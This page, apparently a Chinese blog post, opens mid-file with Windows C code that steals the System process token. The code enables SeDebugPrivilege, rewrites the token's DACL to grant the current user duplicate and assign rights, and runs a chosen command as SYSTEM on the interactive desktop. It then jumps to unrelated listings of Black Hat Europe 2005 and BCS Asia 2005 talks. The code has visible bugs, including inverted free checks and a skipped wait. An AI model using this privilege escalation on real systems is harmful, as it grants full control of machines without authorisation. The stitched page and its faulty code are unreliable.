        if (!GetSecurityDescriptorDacl(pSD, &fDaclPresent, &pAcl,

            &fDaclDefaulted))

        {

            printf("ModifySecurity GetSecurityDescriptorDacl Failed");

            __leave;

        }



        // Get the current user’s name

        TCHAR szName[1024];

        DWORD dwLen = chDIMOF(szName);

        if (!GetUserName(szName, &dwLen))

        {

            printf("ModifySecurity GetUserName Failed");

            __leave;

        }



        // Build an EXPLICIT_ACCESS structure for the ace we wish to add.

        EXPLICIT_ACCESS ea;

        BuildExplicitAccessWithName(&ea, szName, dwAccess, GRANT_ACCESS, 0);

        ea.Trustee.TrusteeType = TRUSTEE_IS_USER;



        // We are allocating a new ACL with a new ace inserted.  The new

        // ACL must be LocalFree’d

        if(ERROR_SUCCESS != SetEntriesInAcl(1, &ea, pAcl, &pNewAcl))

        {

            printf("ModifySecurity SetEntriesInAcl Failed");

            pNewAcl = NULL;

            __leave;

        }



        // Find the buffer sizes we would need to make our SD absolute

        pAcl               = NULL;

        dwSDLength         = 0;

        DWORD dwAclSize    = 0;

        DWORD dwSaclSize   = 0;

        DWORD dwSidOwnLen  = 0;

        DWORD dwSidPrimLen = 0;

        PSECURITY_DESCRIPTOR pAbsSD = NULL;

        if(MakeAbsoluteSD(pSD, pAbsSD, &dwSDLength, pAcl, &dwAclSize, pSacl,

            &dwSaclSize, pSidOwner, &dwSidOwnLen, pSidPrimary, &dwSidPrimLen)

            || (GetLastError() != ERROR_INSUFFICIENT_BUFFER))

        {

            printf("ModifySecurity MakeAbsoluteSD Size Failed");

            __leave;

        }



        // Allocate the buffers

        pAcl = (PACL) LocalAlloc(LPTR, dwAclSize);

        pSacl = (PACL) LocalAlloc(LPTR, dwSaclSize);

        pSidOwner = (PSID) LocalAlloc(LPTR, dwSidOwnLen);

        pSidPrimary = (PSID) LocalAlloc(LPTR, dwSidPrimLen);

        pAbsSD = (PSECURITY_DESCRIPTOR) LocalAlloc(LPTR, dwSDLength);

        if(!(pAcl && pSacl && pSidOwner && pSidPrimary && pAbsSD))

        {

            printf("ModifySecurity Invalid SID Found");

            __leave;

        }



        // And actually make our SD absolute

        if(!MakeAbsoluteSD(pSD, pAbsSD, &dwSDLength, pAcl, &dwAclSize, pSacl,

            &dwSaclSize, pSidOwner, &dwSidOwnLen, pSidPrimary, &dwSidPrimLen))

        {

            printf("ModifySecurity MakeAbsoluteSD Failed");

            __leave;

        }



        // Now set the security descriptor DACL

        if(!SetSecurityDescriptorDacl(pAbsSD, fDaclPresent, pNewAcl,

            fDaclDefaulted))

        {

            printf("ModifySecurity SetSecurityDescriptorDacl Failed");

            __leave;

        }



        // And set the security for the object

        if(!SetKernelObjectSecurity(hProc, DACL_SECURITY_INFORMATION, pAbsSD))

        {

            printf("ModifySecurity SetKernelObjectSecurity Failed");

            __leave;

        }



        fSuccess = TRUE;



    }

    __finally

    {

        // Cleanup

        if (pNewAcl == NULL)

            LocalFree(pNewAcl);



        if (pSD == NULL)

            LocalFree(pSD);



        if (pAcl == NULL)

            LocalFree(pAcl);



        if (pSacl == NULL)

            LocalFree(pSacl);



        if (pSidOwner == NULL)

            LocalFree(pSidOwner);



        if (pSidPrimary == NULL)

            LocalFree(pSidPrimary);



        if(!fSuccess)

        {

            printf("ModifySecurity exception caught in __finally");

        }



        return(fSuccess);

    }

}



HANDLE GetLSAToken()

{

    HANDLE hProc  = NULL;

    HANDLE hToken = NULL;

    BOOL bSuccess = FALSE;

    __try

    {

        // Enable the SE_DEBUG_NAME privilege in our process token

        if (!EnablePrivilege(SE_DEBUG_NAME))

        {

            printf("GetLSAToken EnablePrivilege Failed");

            __leave;

        }



        // Retrieve a handle to the "System" process

        hProc = OpenSystemProcess();

        if(hProc == NULL)

        {

            printf("GetLSAToken OpenSystemProcess Failed");

            __leave;

        }



        // Open the process token with READ_CONTROL and WRITE_DAC access.  We

        // will use this access to modify the security of the token so that we

        // retrieve it again with a more complete set of rights.

        BOOL fResult = OpenProcessToken(hProc, READ_CONTROL | WRITE_DAC,

            &hToken);

        if(FALSE == fResult)  

        {

            printf("GetLSAToken OpenProcessToken Failed");

            __leave;

        }



        // Add an ace for the current user for the token.  This ace will add

        // TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY rights.

        if (!ModifySecurity(hToken, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY

            | TOKEN_QUERY | TOKEN_ADJUST_SESSIONID))

        {

            printf("GetLSAToken ModifySecurity Failed");

            __leave;

        }

        



        // Reopen the process token now that we have added the rights to

        // query the token, duplicate it, and assign it.

        fResult = OpenProcessToken(hProc, TOKEN_QUERY | TOKEN_DUPLICATE

            | TOKEN_ASSIGN_PRIMARY | READ_CONTROL | WRITE_DAC, &hToken);

        if (FALSE == fResult)  

        {

            printf("GetLSAToken OpenProcessToken Failed");

            __leave;

        }

        bSuccess = TRUE;

    }

    __finally

    {

        // Close the System process handle

        if (hProc != NULL)    CloseHandle(hProc);

        if(bSuccess)

            return hToken;

        else

        {

            ::CloseHandle(hToken);

            return NULL;

        }

    }

}



#define DESKTOP_ALL (DESKTOP_READOBJECTS | DESKTOP_CREATEWINDOW | DESKTOP_CREATEMENU | DESKTOP_HOOKCONTROL | \

        DESKTOP_JOURNALRECORD | DESKTOP_JOURNALPLAYBACK | \

        DESKTOP_ENUMERATE | DESKTOP_WRITEOBJECTS | \

        DESKTOP_SWITCHDESKTOP | STANDARD_RIGHTS_REQUIRED)



#define WINSTA_ALL (WINSTA_ENUMDESKTOPS | WINSTA_READATTRIBUTES |  \

    WINSTA_ACCESSCLIPBOARD | WINSTA_CREATEDESKTOP | \

        WINSTA_WRITEATTRIBUTES | WINSTA_ACCESSGLOBALATOMS | \

        WINSTA_EXITWINDOWS | WINSTA_ENUMERATE | \

        WINSTA_READSCREEN | \

        STANDARD_RIGHTS_REQUIRED)



#define GENERIC_ACCESS (GENERIC_READ | GENERIC_WRITE | GENERIC_EXECUTE | GENERIC_ALL)



BOOL AddAceToWindowStation(HWINSTA hwinsta, PSID psid);



BOOL AddAceToDesktop(HDESK hdesk, PSID psid);



BOOL GetLogonSID(HANDLE hToken, PSID *ppsid)

{

    PWTS_PROCESS_INFO pProcessInfo = NULL;

    DWORD             ProcessCount = 0;

    BOOL                ret=FALSE;



    if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pProcessInfo, &ProcessCount))

    {

        // dump each process description

        for (DWORD CurrentProcess = 0; CurrentProcess < ProcessCount; CurrentProcess++)

        {



            if( strcmp(pProcessInfo[CurrentProcess].pProcessName, "System") == 0 )

            {

                //*ppsid = pProcessInfo[CurrentProcess].pUserSid;

                DWORD dwLength = GetLengthSid(pProcessInfo[CurrentProcess].pUserSid);

                *ppsid = (PSID) HeapAlloc(GetProcessHeap(),

                            HEAP_ZERO_MEMORY, dwLength);

                if (*ppsid == NULL)

                    break;

                if (!CopySid(dwLength, *ppsid, pProcessInfo[CurrentProcess].pUserSid))

                {

                    HeapFree(GetProcessHeap(), 0, (LPVOID)*ppsid);

                    break;

                }

                ret=TRUE;

                break;

            }

        }



        WTSFreeMemory(pProcessInfo);

    }



    return ret;

}



BOOL GetLogonSID_1 (HANDLE hToken, PSID *ppsid)

{

   BOOL bSuccess = FALSE;

   DWORD dwIndex;

   DWORD dwLength = 0;

   PTOKEN_GROUPS ptg = NULL;



// Verify the parameter passed in is not NULL.

    if (NULL == ppsid)

        goto Cleanup;



// Get required buffer size and allocate the TOKEN_GROUPS buffer.



   if (!GetTokenInformation(

         hToken,         // handle to the access token

         TokenGroups,    // get information about the token’s groups

         (LPVOID) ptg,   // pointer to TOKEN_GROUPS buffer

         0,              // size of buffer

         &dwLength       // receives required buffer size

      ))

   {

      if (GetLastError() != ERROR_INSUFFICIENT_BUFFER)

         goto Cleanup;



      ptg = (PTOKEN_GROUPS)HeapAlloc(GetProcessHeap(),

         HEAP_ZERO_MEMORY, dwLength);



      if (ptg == NULL)

         goto Cleanup;

   }





// Get the token group information from the access token.



   if (!GetTokenInformation(

         hToken,         // handle to the access token

         TokenGroups,    // get information about the token’s groups

         (LPVOID) ptg,   // pointer to TOKEN_GROUPS buffer

         dwLength,       // size of buffer

         &dwLength       // receives required buffer size

         ))

   {

      goto Cleanup;

   }



// Loop through the groups to find the logon SID.



   for (dwIndex = 0; dwIndex < ptg->GroupCount; dwIndex++)

      if ((ptg->Groups[dwIndex].Attributes & SE_GROUP_LOGON_ID)

             ==  SE_GROUP_LOGON_ID)

      {

      // Found the logon SID; make a copy of it.



         dwLength = GetLengthSid(ptg->Groups[dwIndex].Sid);

         *ppsid = (PSID) HeapAlloc(GetProcessHeap(),

                     HEAP_ZERO_MEMORY, dwLength);

         if (*ppsid == NULL)

             goto Cleanup;

         if (!CopySid(dwLength, *ppsid, ptg->Groups[dwIndex].Sid))

         {

             HeapFree(GetProcessHeap(), 0, (LPVOID)*ppsid);

             goto Cleanup;

         }

         break;

      }



   bSuccess = TRUE;



Cleanup:



// Free the buffer for the token groups.



   if (ptg != NULL)

      HeapFree(GetProcessHeap(), 0, (LPVOID)ptg);



   return bSuccess;

}









VOID FreeLogonSID (PSID *ppsid)

{

    HeapFree(GetProcessHeap(), 0, (LPVOID)*ppsid);

}





BOOL StartInteractiveClientProcess (

    LPTSTR lpszUsername,    // client to log on

    LPTSTR lpszDomain,      // domain of client’s account

    LPTSTR lpszPassword,    // client’s password

    LPTSTR lpCommandLine,    // command line to execute

    HANDLE Token = NULL

)

{

   HANDLE      hToken;

   HDESK       hdesk = NULL;

   HWINSTA     hwinsta = NULL, hwinstaSave = NULL;

   PROCESS_INFORMATION pi;

   PSID pSid = NULL;

   STARTUPINFO si;

   BOOL bResult = FALSE;



// Log the client on to the local computer.



   if(Token!=NULL)

   {

       printf("%08x\n", Token);

       hToken = Token;

   }

   else if (!LogonUser(

           lpszUsername,

           lpszDomain,

           lpszPassword,

           LOGON32_LOGON_INTERACTIVE,

           LOGON32_PROVIDER_DEFAULT,

           &hToken) )

   {

      goto Cleanup;

   }



// Save a handle to the caller’s current window station.



   if ( (hwinstaSave = GetProcessWindowStation() ) == NULL)

      goto Cleanup;



// Get a handle to the interactive window station.



   hwinsta = OpenWindowStation(

       "winsta0",                   // the interactive window station

       FALSE,                       // handle is not inheritable

       READ_CONTROL | WRITE_DAC);   // rights to read/write the DACL



   if (hwinsta == NULL)

      goto Cleanup;



// To get the correct default desktop, set the caller’s

// window station to the interactive window station.



   if (!SetProcessWindowStation(hwinsta))

      goto Cleanup;



// Get a handle to the interactive desktop.



   hdesk = OpenDesktop(

      "default",     // the interactive window station

      0,             // no interaction with other desktop processes

      FALSE,         // handle is not inheritable

      READ_CONTROL | // request the rights to read and write the DACL

      WRITE_DAC |

      DESKTOP_WRITEOBJECTS |

      DESKTOP_READOBJECTS);



// Restore the caller’s window station.



   if (!SetProcessWindowStation(hwinstaSave))

      goto Cleanup;



   if (hdesk == NULL)

      goto Cleanup;



// Get the SID for the client’s logon session.



   if (!GetLogonSID(hToken, &pSid))

      goto Cleanup;



// Allow logon SID full access to interactive window station.



   if (! AddAceToWindowStation(hwinsta, pSid) )

      goto Cleanup;



// Allow logon SID full access to interactive desktop.



   if (! AddAceToDesktop(hdesk, pSid) )

      goto Cleanup;



// Impersonate client to ensure access to executable file.



   if (! ImpersonateLoggedOnUser(hToken) )

      goto Cleanup;



// Initialize the STARTUPINFO structure.

// Specify that the process runs in the interactive desktop.



   ZeroMemory(&si, sizeof(STARTUPINFO));

   si.cb= sizeof(STARTUPINFO);

   si.lpDesktop = TEXT("winsta0\\default");  //You can use EnumWindowStations to enum desktop



// Launch the process in the client’s logon session.



   bResult = CreateProcessAsUser(

      hToken,            // client’s access token

      NULL,              // file to execute

      lpCommandLine,     // command line

      NULL,              // pointer to process SECURITY_ATTRIBUTES

      NULL,              // pointer to thread SECURITY_ATTRIBUTES

      FALSE,             // handles are not inheritable

      NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE,   // creation flags

      NULL,              // pointer to new environment block

      NULL,              // name of current directory

      &si,               // pointer to STARTUPINFO structure

      &pi                // receives information about new process

   );



// End impersonation of client.



   RevertToSelf();



   goto Cleanup;

   //return bResult; <————————————————————————



   if (bResult && pi.hProcess != INVALID_HANDLE_VALUE)

   {

      WaitForSingleObject(pi.hProcess, INFINITE);

      CloseHandle(pi.hProcess);

   }



   if (pi.hThread != INVALID_HANDLE_VALUE)

      CloseHandle(pi.hThread);  



Cleanup:



   if (hwinstaSave != NULL)

      SetProcessWindowStation (hwinstaSave);



// Free the buffer for the logon SID.



   if (pSid)

      FreeLogonSID(&pSid);



// Close the handles to the interactive window station and desktop.



   if (hwinsta)

      CloseWindowStation(hwinsta);



   if (hdesk)

      CloseDesktop(hdesk);



// Close the handle to the client’s access token.



   if (hToken != INVALID_HANDLE_VALUE)

      CloseHandle(hToken);  



   return bResult;

}



BOOL AddAceToWindowStation(HWINSTA hwinsta, PSID psid)

{

   ACCESS_ALLOWED_ACE   *pace;

   ACL_SIZE_INFORMATION aclSizeInfo;

   BOOL                 bDaclExist;

   BOOL                 bDaclPresent;

   BOOL                 bSuccess = FALSE;

   DWORD                dwNewAclSize;

   DWORD                dwSidSize = 0;

   DWORD                dwSdSizeNeeded;

   PACL                 pacl;

   PACL                 pNewAcl;

   PSECURITY_DESCRIPTOR psd = NULL;

   PSECURITY_DESCRIPTOR psdNew = NULL;

   PVOID                pTempAce;

   SECURITY_INFORMATION si = DACL_SECURITY_INFORMATION;

   unsigned int         i;



   __try

   {

      // Obtain the DACL for the window station.



      if (!GetUserObjectSecurity(

             hwinsta,

             &si,

             psd,

             dwSidSize,

             &dwSdSizeNeeded)

      )

      if (GetLastError() == ERROR_INSUFFICIENT_BUFFER)

      {

         psd = (PSECURITY_DESCRIPTOR)HeapAlloc(

               GetProcessHeap(),

               HEAP_ZERO_MEMORY,

               dwSdSizeNeeded);



         if (psd == NULL)

            __leave;



         psdNew = (PSECURITY_DESCRIPTOR)HeapAlloc(

               GetProcessHeap(),

               HEAP_ZERO_MEMORY,

               dwSdSizeNeeded);



         if (psdNew == NULL)

            __leave;



         dwSidSize = dwSdSizeNeeded;



         if (!GetUserObjectSecurity(

               hwinsta,

               &si,

               psd,

               dwSidSize,

               &dwSdSizeNeeded)

         )

            __leave;

      }

      else

         __leave;



      // Create a new DACL.



      if (!InitializeSecurityDescriptor(

            psdNew,

            SECURITY_DESCRIPTOR_REVISION)

      )

         __leave;



      // Get the DACL from the security descriptor.



      if (!GetSecurityDescriptorDacl(

            psd,

            &bDaclPresent,

            &pacl,

            &bDaclExist)

      )

         __leave;



      // Initialize the ACL.



      ZeroMemory(&aclSizeInfo, sizeof(ACL_SIZE_INFORMATION));

      aclSizeInfo.AclBytesInUse = sizeof(ACL);



      // Call only if the DACL is not NULL.



      if (pacl != NULL)

      {

         // get the file ACL size info

         if (!GetAclInformation(

               pacl,

               (LPVOID)&aclSizeInfo,

               sizeof(ACL_SIZE_INFORMATION),

               AclSizeInformation)

         )

            __leave;

      }



      // Compute the size of the new ACL.



      dwNewAclSize = aclSizeInfo.AclBytesInUse + (2*sizeof(ACCESS_ALLOWED_ACE)) + (2*GetLengthSid(psid)) – (2*sizeof(DWORD));



      // Allocate memory for the new ACL.



      pNewAcl = (PACL)HeapAlloc(

            GetProcessHeap(),

            HEAP_ZERO_MEMORY,

            dwNewAclSize);



      if (pNewAcl == NULL)

         __leave;



      // Initialize the new DACL.



      if (!InitializeAcl(pNewAcl, dwNewAclSize, ACL_REVISION))

         __leave;



      // If DACL is present, copy it to a new DACL.



      if (bDaclPresent)

      {

         // Copy the ACEs to the new ACL.

         if (aclSizeInfo.AceCount)

         {

            for (i=0; i < aclSizeInfo.AceCount; i++)

            {

               // Get an ACE.

               if (!GetAce(pacl, i, &pTempAce))

                  __leave;



               // Add the ACE to the new ACL.

               if (!AddAce(

                     pNewAcl,

                     ACL_REVISION,

                     MAXDWORD,

                     pTempAce,

                    ((PACE_HEADER)pTempAce)->AceSize)

               )

                  __leave;

            }

         }

      }



      // Add the first ACE to the window station.



      pace = (ACCESS_ALLOWED_ACE *)HeapAlloc(

            GetProcessHeap(),

            HEAP_ZERO_MEMORY,

            sizeof(ACCESS_ALLOWED_ACE) + GetLengthSid(psid) -

                  sizeof(DWORD));



      if (pace == NULL)

         __leave;



      pace->Header.AceType  = ACCESS_ALLOWED_ACE_TYPE;

      pace->Header.AceFlags = CONTAINER_INHERIT_ACE |

                   INHERIT_ONLY_ACE | OBJECT_INHERIT_ACE;

      pace->Header.AceSize  = sizeof(ACCESS_ALLOWED_ACE) +

                   GetLengthSid(psid) – sizeof(DWORD);

      pace->Mask            = GENERIC_ACCESS;



      if (!CopySid(GetLengthSid(psid), &pace->SidStart, psid))

         __leave;



      if (!AddAce(

            pNewAcl,

            ACL_REVISION,

            MAXDWORD,

            (LPVOID)pace,

            pace->Header.AceSize)

      )

         __leave;



      // Add the second ACE to the window station.



      pace->Header.AceFlags = NO_PROPAGATE_INHERIT_ACE;

      pace->Mask            = WINSTA_ALL;



      if (!AddAce(

            pNewAcl,

            ACL_REVISION,

            MAXDWORD,

            (LPVOID)pace,

            pace->Header.AceSize)

      )

         __leave;



      // Set a new DACL for the security descriptor.



      if (!SetSecurityDescriptorDacl(

            psdNew,

            TRUE,

            pNewAcl,

            FALSE)

      )

         __leave;



      // Set the new security descriptor for the window station.



      if (!SetUserObjectSecurity(hwinsta, &si, psdNew))

         __leave;



      // Indicate success.



      bSuccess = TRUE;

   }

   __finally

   {

      // Free the allocated buffers.



      if (pace != NULL)

         HeapFree(GetProcessHeap(), 0, (LPVOID)pace);



      if (pNewAcl != NULL)

         HeapFree(GetProcessHeap(), 0, (LPVOID)pNewAcl);



      if (psd != NULL)

         HeapFree(GetProcessHeap(), 0, (LPVOID)psd);



      if (psdNew != NULL)

         HeapFree(GetProcessHeap(), 0, (LPVOID)psdNew);

   }



   return bSuccess;



}



BOOL AddAceToDesktop(HDESK hdesk, PSID psid)

{

   ACL_SIZE_INFORMATION aclSizeInfo;

   BOOL                 bDaclExist;

   BOOL                 bDaclPresent;

   BOOL                 bSuccess = FALSE;

   DWORD                dwNewAclSize;

   DWORD                dwSidSize = 0;

   DWORD                dwSdSizeNeeded;

   PACL                 pacl;

   PACL                 pNewAcl;

   PSECURITY_DESCRIPTOR psd = NULL;

   PSECURITY_DESCRIPTOR psdNew = NULL;

   PVOID                pTempAce;

   SECURITY_INFORMATION si = DACL_SECURITY_INFORMATION;

   unsigned int         i;



   __try

   {

      // Obtain the security descriptor for the desktop object.



      if (!GetUserObjectSecurity(

            hdesk,

            &si,

            psd,

            dwSidSize,

            &dwSdSizeNeeded))

      {

         if (GetLastError() == ERROR_INSUFFICIENT_BUFFER)

         {

            psd = (PSECURITY_DESCRIPTOR)HeapAlloc(

                  GetProcessHeap(),

                  HEAP_ZERO_MEMORY,

                  dwSdSizeNeeded );



            if (psd == NULL)

               __leave;



            psdNew = (PSECURITY_DESCRIPTOR)HeapAlloc(

                  GetProcessHeap(),

                  HEAP_ZERO_MEMORY,

                  dwSdSizeNeeded);



            if (psdNew == NULL)

               __leave;



            dwSidSize = dwSdSizeNeeded;



            if (!GetUserObjectSecurity(

                  hdesk,

                  &si,

                  psd,

                  dwSidSize,

                  &dwSdSizeNeeded)

            )

               __leave;

         }

         else

            __leave;

      }



      // Create a new security descriptor.



      if (!InitializeSecurityDescriptor(

            psdNew,

            SECURITY_DESCRIPTOR_REVISION)

      )

         __leave;



      // Obtain the DACL from the security descriptor.



      if (!GetSecurityDescriptorDacl(

            psd,

            &bDaclPresent,

            &pacl,

            &bDaclExist)

      )

         __leave;



      // Initialize.



      ZeroMemory(&aclSizeInfo, sizeof(ACL_SIZE_INFORMATION));

      aclSizeInfo.AclBytesInUse = sizeof(ACL);



      // Call only if NULL DACL.



      if (pacl != NULL)

      {

         // Determine the size of the ACL information.



         if (!GetAclInformation(

               pacl,

               (LPVOID)&aclSizeInfo,

               sizeof(ACL_SIZE_INFORMATION),

               AclSizeInformation)

         )

            __leave;

      }



      // Compute the size of the new ACL.



      dwNewAclSize = aclSizeInfo.AclBytesInUse +

            sizeof(ACCESS_ALLOWED_ACE) +

            GetLengthSid(psid) – sizeof(DWORD);



      // Allocate buffer for the new ACL.



      pNewAcl = (PACL)HeapAlloc(

            GetProcessHeap(),

            HEAP_ZERO_MEMORY,

            dwNewAclSize);



      if (pNewAcl == NULL)

         __leave;



      // Initialize the new ACL.



      if (!InitializeAcl(pNewAcl, dwNewAclSize, ACL_REVISION))

         __leave;



      // If DACL is present, copy it to a new DACL.



      if (bDaclPresent)

      {

         // Copy the ACEs to the new ACL.

         if (aclSizeInfo.AceCount)

         {

            for (i=0; i < aclSizeInfo.AceCount; i++)

            {

               // Get an ACE.

               if (!GetAce(pacl, i, &pTempAce))

                  __leave;



               // Add the ACE to the new ACL.

               if (!AddAce(

                  pNewAcl,

                  ACL_REVISION,

                  MAXDWORD,

                  pTempAce,

                  ((PACE_HEADER)pTempAce)->AceSize)

               )

                  __leave;

            }

         }

      }



      // Add ACE to the DACL.



      if (!AddAccessAllowedAce(

            pNewAcl,

            ACL_REVISION,

            DESKTOP_ALL,

            psid)

      )

         __leave;



      // Set new DACL to the new security descriptor.



      if (!SetSecurityDescriptorDacl(

            psdNew,

            TRUE,

            pNewAcl,

            FALSE)

      )

         __leave;



      // Set the new security descriptor for the desktop object.



      if (!SetUserObjectSecurity(hdesk, &si, psdNew))

         __leave;



      // Indicate success.



      bSuccess = TRUE;

   }

   __finally

   {

      // Free buffers.



      if (pNewAcl != NULL)

         HeapFree(GetProcessHeap(), 0, (LPVOID)pNewAcl);



      if (psd != NULL)

         HeapFree(GetProcessHeap(), 0, (LPVOID)psd);



      if (psdNew != NULL)

         HeapFree(GetProcessHeap(), 0, (LPVOID)psdNew);

   }



   return bSuccess;

}



int main(int argc, char **argv)

{

    HANDLE hToken = NULL;

    EnablePrivilege(SE_DEBUG_NAME);

    hToken = GetLSAToken();

    StartInteractiveClientProcess(NULL, NULL, NULL, argc==2?argv[1]:"regedit", hToken);

    return 0;

}







上面这两种方法都能很好的完全功能,但是建议用第二种,虽然代码看上去有点长,但是很稳定.

代码又长又乱,其中肯定有错误之处,还请大家告之.谢过先…

Black Hat Europe 2005
Interested in obtaining a conference CD with all the presentations and tools? Contact ping at blackhat.com
Track/Speaker/Topic	Presentation (PDFs)	Notes/Tools	Video (not yet available)
Keynote Presentation – Black Hat Europe 2005
Simon Davies, Privacy International
Speakers – Black Hat Europe 2005
David Barroso Berrueta & Alfredo Andres Yersinia, A Framework For Layer 2 Attacks		tool
Jon Callas Hacking PGP
Cesar Cerrudo Hacking Windows Internals		tool
Job de Haas Symbian Security
Steve Dugan A New Password Capture on Cisco System Devices
Arian Evans Building Zero-Day Self-Defending Web Applications: Enforcing Authoritative Action to Stop Session Attacks
Chris Farrow Injecting Trojans via Patch Management Software & Other Evil Deeds
Nicolas Fischbach Network Flows and Security
Halvar Flake & Rolf Rolles Compare, Port, Navigate
Kenneth Geers Hacking in a Foreign Language: A Network Security Guide to Russia
Joe Grand Can You Really Trust Hardware? Exploring Security Problems in Hardware Devices
the Grugq The Art of Defiling: Defeating Forensic Analysis
Dan Kaminsky Attacking Distributed Systems: The DNS Case Study
Christian Klein & Ilja van Sprundel Mac OS X Kernel Insecurity
Alexander Kornbrust Database Rootkits		tool
Adam Laurie, Martin Herfurt & Marcel Holtmann Bluetooth Hacking – Full Disclosure
David Litchfield SQL Injection and Data Mining Through Inference
Johnny Long Google Hacking for Penetration Testers
Laurent Oudot WLAN and Stealth Issues		tool
Sensepost Revolutions in Web Server/Application Assessments
Saumil Shah Defeating Automated Web Assessment Tools
Paul Simmonds Architectural Challenges in a Jericho World
Alex Wheeler & Neel Mehta Owning Anti-Virus: Weaknesses in a Critical Security Component
Stefano Zanero Automatically Detecting Web Application Vulnerabilities by Variable Flow Reconstruction

BCS Asia 2005 Archive

The Technical Track:

• Don Bailey – Once a Thief:
  Portable Document Format (PDF) (100KB)
• The Grugq – Digital Forensics and the Art of Anti-Forensics:
  Powerpoint (PPT) (272KB)
• Fyodor Yarochkin – Advanced Intrusion Data Normalisation and Correlation:
  Powerpoint (PPT) (176KB)
• S.K. Chong – Windows Local Kernel Exploitation:
  Powerpoint (PPT) (244KB)
• Cesar Cerrudo – Windows IPC Exploitation:
  Powerpoint (PPT) (152KB) – Toolkit
• Anton Bolshakov – Distributed Denial of Service Warfare:
  Powerpoint (PPT) (584KB)
• Valens Riyadi – IT Emergency Mobile Unit:
  Powerpoint (PPT) (1.6MB)
• Marc Schonefeld – Java & Secure Programming:
  Powerpoint (PPT) (764KB)
• Himanshu Dwivedi – Attacking and Protecting Storage Area Networks:
  Portable Document Format (PDF) (1.7MB)
• Charl Van Der Walt – Assessing Server Security – State of the Art:
  Portable Document Format (PDF) (36.9MB), Toolkit
• Shreeraj Shah – Web Application Kung-Fu, The Art of Defense:
  Powerpoint (PPT) (356KB), White Papers: Footprints Disco, HTTPMod
• Ryan McBride – Robust Firewalls with OpenBSD and PF:
  Portable Document Format (PDF) (188KB)

http://www.blackhat.com/html/bh-media-archives/bh-multi-media-archives.html#EU-2005
http://www.bellua.com/bcs2005/asia05.archive.html